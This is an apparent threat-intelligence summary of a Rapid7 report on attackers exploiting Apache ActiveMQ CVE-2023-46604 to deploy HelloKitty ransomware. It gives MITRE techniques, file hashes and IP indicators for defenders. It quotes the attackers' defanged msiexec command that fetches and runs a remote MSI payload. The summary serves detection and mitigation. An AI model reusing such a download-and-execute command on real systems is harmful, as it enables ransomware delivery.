Rapid7 MDR observed suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two customer environments, with attackers attempting to deploy HelloKitty ransomware on outdated ActiveMQ versions. The analysis details the vulnerability, attacker behavior (including MSIExec-delivered payloads), and specific indicators to help defenders mitigate risk. #HelloKitty #ActiveMQ #CVE-2023-46604 #dllloader #EncDLL #M2 #M4
Keypoints
- Rapid7 MDR observed suspected CVE-2023-46604 exploitation in two environments, tied to the HelloKitty ransomware family.
- The vulnerability is an insecure deserialization issue in Apache ActiveMQ OpenWire, enabling remote code execution (CVE-2023-46604).
- Adversaries exploited the vulnerability to run Java.exe targeting a specific ActiveMQ instance and used MSIExec to load remote binaries M2.png and M4.png.
- HelloKitty payloads are delivered via MSI packages (M2.msi, M4.msi) containing dllloader and EncDLL, with encryption of files and a .locked extension.
- IOCs include specific logs, host IPs, domain, file hashes, and URLs used to download the payloads (e.g., 172.245.16[.]125).
- Mitigation centers on updating ActiveMQ to fixed versions and applying Apache’s guidance, with Rapid7 detections and customer rules in MDR/InsightIDR/MTC.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability allows a remote attacker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. “CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.””
- [T1218.005] Signed Binary Proxy Execution – MSIExec is used to load remote binaries (M2.png and M4.png) via MSIExec during post-exploitation. “load remote binaries named M2.png and M4.png using MSIExec.”
- [T1105] Ingress Tool Transfer – The adversary downloads payloads from a remote server (M2.png/M4.png) hosted at 172.245.16[.]125. “Dropped and executed via the msiexec command” with downloads from hxxp://172.245.16[.]125/…
- [T1059.003] Windows Command Shell – Commands are executed through cmd.exe to start MSIExec, e.g., “cmd.exe /c “start msiexec /q /i hxxp://172.245.16[.]125/m4.png”.”
- [T1071.001] Web Protocols – The malware communicates to an HTTP server (172.245.16[.]125) as part of its operations. “communicating to an HTTP server, 172.245.16[.]125.”
- [T1490] Inhibit System Recovery – The ransomware behavior includes deleting or manipulating shadow copies to hinder recovery (Volume Shadow Service Delete Shadow Copies). “Volume Shadow Service Delete Shadow Copies.”
- [T1486] Data Encrypted for Impact – EncDLL encrypts specific file extensions and appends .locked to encrypted files. “encrypt specific file extensions using the RSACryptoServiceProvider … appended with the extension .locked.”
Indicators of Compromise
- [Process] Java.exe launching ActiveMQ-targeted binary – target path shown (D:Program filesActiveMQapache-activemq-5.15.3binwin64) and used as parent process in incidents.
- [URL] hxxp://172.245.16[.]125/m4.png, hxxp://172.245.16[.]125/m2.png – downloads via msiexec.
- [File] M2.msi – 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
- [File] M4.msi – 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
- [File] dllloader – C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
- [File] EncDll – 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
- [IP] 192.168.86.35 – observed in exploitation log with port 61616 (researcher IP in lab environment)
- [IP] 172.245.16.125 – command and control/download domain hosting MSI packages